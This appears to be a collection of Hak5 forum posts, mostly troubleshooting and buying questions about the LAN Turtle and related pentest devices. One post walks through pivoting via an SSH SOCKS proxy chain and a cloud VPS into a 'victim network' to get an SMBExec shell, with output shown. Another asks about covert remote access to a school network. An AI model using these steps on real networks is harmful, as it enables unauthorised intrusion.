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  1. Hi everyone, I'm looking to get a little help in connecting my devices to cloudc2 because NONE of them are connecting. I so far have tried every single possible solution I found on this forum but nothing is working. I've been running my c2 server on windows and kali using the following commands: c2-3.3.0_amd64_windows.exe -hostname localhost -listenport 80 c2-3.3.0_amd64_linux -hostname localhost -listenport 80 The cloud UI itself runs smoothly and I can login. I tried adding my Shark Jack, Lan Turtle, Packet Squirrel, and Pineapple VII by downloading the relevant device.config file and transferring it to the devices using: scp device.config root@172.16.X.1:/etc/ NONE of them connected to the C2 server. I tried invoking C2CONNECT and C2DISCONNECT on all of them and still NONE of them connected. I deleted device.config and C2.config from each them re-downloaded new device.config files and repeated the process but still NONE of them connected. (I already made sure they are all connected to the internet by SSHing directly into each one and pinging google.com). Then I tried deleting c2.db and regenerating the tokens and setting up C2 again (on both windows and linux) and repeating the process but still NONE of them connected. Any idea what's going on?
  2. I am quite new to the world of hacking, and recently I have invested in the lan-turtle, and I was wondering what everyone's suggestions were on what Hak5 tool I should invest in next? '
  3. While we all wait I thought I'd put together the Hak5 Kit To Rule Them All (it's a slow day in school today). Long Range USB WiFi Adapter $19.99 Micro Ethernet Switch $14.99 WiFi Pineapple - TETRA $199.99 WiFi Pineapple - NANO $99.99 Hak5 Field Kit Pocket Guide $19.99 WiFi Pineappling Book $12.00 LAN Turtle - LAN Turtle 3G $250.00 LAN Turtle - LAN Turtle SD $54.99 LAN Turtle - LAN Turtle Classic $44.99 USB Rubber Ducky - USB Rubber Ducky Deluxe $44.99 Bash Bunny $99.99 Packet Squirrel $59.99 SUBTOTAL: $921.90 Adapters & Cables: USB OTG adapter Micro USB Y-Cable USB A to USB C adapter USB A male to female extension Micro SD USB card reader Micro USB cables USB Ethernet adapter Retractable Ethernet cable Elite Hak5 Gear organizer Pair of Trust Your Technolust key-ring flight tags Anker PowerCore+ 13400 USB Battery SUBTOTAL: $????
  4. I have purchased about 80% of your equipment, Pineapple Mark V, Nano tactical, bash bunny, pocket squirrel, lan turtle, usb rubber ducky, router, wifi dongles, etc. Unfortunately I purchased them separately as they came out. Therefore I don't have a custom Hak5 case to keep them in. I wish you would consider selling the cases separately. I would be your first customer to buy one. Love your products, and the show.
  5. Hi, Just a question - got the LAN Turtle 3G to play with and want to make it more "believable" as an adapter - how easy or hard would it be to change out the USB to USB-C? Any tips or recommendations? Thoughts on tools required? Much appreciated from a newbie, jenku
  6. I've set up an OpenVPN Server on my VPS with OpenVPN Road Warrior Installer. How does one configure the client.ovpn to act as a gateway? Like mentioned in this Youtube Tutorial. I know how to configure this in OpenVPN Acces Server, but I don't want to replace the Road Warrior Installation with OpenVPN AS. Thanks in advance, Dan
  7. Hello All, I have been in and out of the scene for years and I needed to hack into a few devices for work recently. Anyway with my interest reinvigorated I was wanting to know what would be a good starting point to purchase one of these devices. I'm up in the air on this as I will probably end up with another one once I purchase a field kit. I'm leaning toward the USB Rubber Ducky or the LAN Turtle as cash is a bit tight right now. On the flip side of this though is if I get the Wifi Pineapple Nano I will not end up with a double device if I get the Elite Field Kit as that comes with the Tetra.I figure when the Upgraded Field Kits release they will have the Bash Bunny also. Then I will have all the Things! YAY! Opinions, thoughts, and what is your reasoning? Thank you in advance for all feedback, neotracer
  8. Received my lan turtle awhile back. Just found time to play with it. I am running windows 10. First item: The lan turtle seems very loose in every usb port I have tried it. I have tried it in several different computers and it seems to jiggle and does not fit tight.Second item: None of my windows computers will recognize it. I was able to use putty to ssh into it and change the password but cannot update it. I attach a ethernet cable to it and click update and get the message "must be connected to internet to update" What am I doing wrong? I am a noob at this.
  9. Is it possible to enable SSH logging on the LAN Turtle? I have enabled logging in sshd_config, however no logs occur when remotely accessing the Turtle via SSH. Thanks!
  10. Hello, I just received my first LanTurtle and i wanted to test it with the quickcreds module, however when the modul is loaded en I plug it in a Logged on machine, the orange light keeps blinking and there are no log files what so ever, the module script keeps making the number folders but they are all empty. and the responder.log only states -->> Starting attack...
  11. I have followed the wiki steps for factory resetting the Lan Turtle ( https://lanturtle.com/wiki/#!index.md ) In addition to this, I have followed this fellow who seems to have had the same problem. (And fixed it) However, I am having absolutely no luck reaching the internal webserver of the lan turtle. Once I type in 192.168.1.1 into my web browser, it hangs for approximately 2 seconds, and states that there is no internet. If someone could help me asap, it would be greatly appreciated, as I need it for a demonstration this week. (Tomorrow evening) Thank you for your time. PS. If it helps, I am on the Parrot operating system, although I do have both windows and default debian installed as well. (I've tried all 3 OSs, and still no luck.)
  12. I have followed the wiki steps for factory resetting the Lan Turtle ( https://lanturtle.com/wiki/#!index.md ) In addition to this, I have followed this fellow who seems to have had the same problem. (And fixed it) However, I am having absolutely no luck reaching the internal webserver of the lan turtle. Once I type in 192.168.1.1 into my web browser, it hangs for approximately 2 seconds, and states that there is no internet. If someone could help me asap, it would be greatly appreciated, as I need it for a demonstration this week. Thank you for your time. PS. If it helps, I am on the Parrot operating system, although I do have both windows and default debian installed as well. (I've tried all 3 OSs, and still no luck.)
  13. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  14. I am a security tester and I have been hired at a public school. What I'm wanting to achieve is to be able to access the school network from my home. I understand on connecting my computer and the turtle to a vpn. Example: «My home computer» > VPN > lan turtle > school computer > «school network» Basically the goal is to plug the turtle (with the right modules) into a computer and plug the Ethernet cord into the lan turtle. Then go home and access the network and do what I need to do. Example: Ethernet > lan turtle > school computer > school network The questions are: 1. Does the host computer (the one with the turtle plugged in) need to be on? 2. Does the host computer being logged off matter? 3. Would my theory work? 4. How could I get a list of every user on the network (school systems are tricky, any user can be Logged in on any computer)? 5. Will it just be that school network or will I also access the entire county school network?
  15. Hi, I purchased the lan turtle this May from Edutech Hakshop, and was on the side until some days ago when I decided to play with it. Unfortunately I discovered that I cannot SSH to it, with or without the LAN cable on the other side. I tried both my Macbook and in WIN10 through a Virtual Box machine but no luck, even though I can see the Realtek USB device in Virtual Box. I would like to ask if this needs to be replaced, or you suggest me to try a "Factory Reset" first? Thanks
  16. Received my LAN Turtle today and have been hacking away for past hour. However, when I tried to set up autossh, I began seeing filesystem errors. It seems file system is full and has no more disk space. I uninstalled all modules and still continue to see the errors. Here is some output for your kind reading :) root@turtle:~# ssh -ash: ssh: Input/output error root@turtle:~# dmesg | tail [ 25.800000] SQUASHFS error: xz_dec_run error, data probably corrupt [ 25.800000] SQUASHFS error: squashfs_read_data failed to read block 0x300242 [ 25.810000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.820000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.820000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.830000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.840000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.840000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.850000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.860000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.860000] SQUASHFS error: Unable to read data cache entry [300242] root@turtle:~# df -h Filesystem Size Used Available Use% Mounted on rootfs 4.6M 4.5M 104.0K 98% / /dev/root 10.3M 10.3M 0 100% /rom tmpfs 30.0M 92.0K 29.9M 0% /tmp /dev/mtdblock3 4.6M 4.5M 104.0K 98% /overlay overlayfs:/overlay 4.6M 4.5M 104.0K 98% / tmpfs 512.0K 0 512.0K 0% /dev Any suggestions folks? Thanks.
  17. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
  18. Hey guys - When I try to run the nmap scan, I'm not able to configure a log location. I select the "Log - Choose Log Location" from the turtle gui, but I don't go to another screen, it just flashes the same screen. I setup sshfs just fine so I don't clog up the internal storage on the device, so ideally I'd point the nmap to /sshfs. Any ideas? Known bug? Anyone else able to reproduce this? Thanks in advance telot
  19. Hi, Sometime a go I came across this talk from DefCon 19: The guy mentions the raspberry pi, but the turtle should be able to do this with minor modifications to the bridging code? Possibly have a flag on the code of whether to enable / disable the patch? The rest of the code is actually documented as a script on a pdf as well. Tim
  20. I got my turtle yesterday, and playing around in the cli I've found arpspoof, tcpdump, dsniff, hping3, and ettercap. All ripe for module-making! I'm sure I'm missing some others - what nuggets of goodness have you guys found? This turtle must be mcdonalds, cause I'm lovin' it! telot
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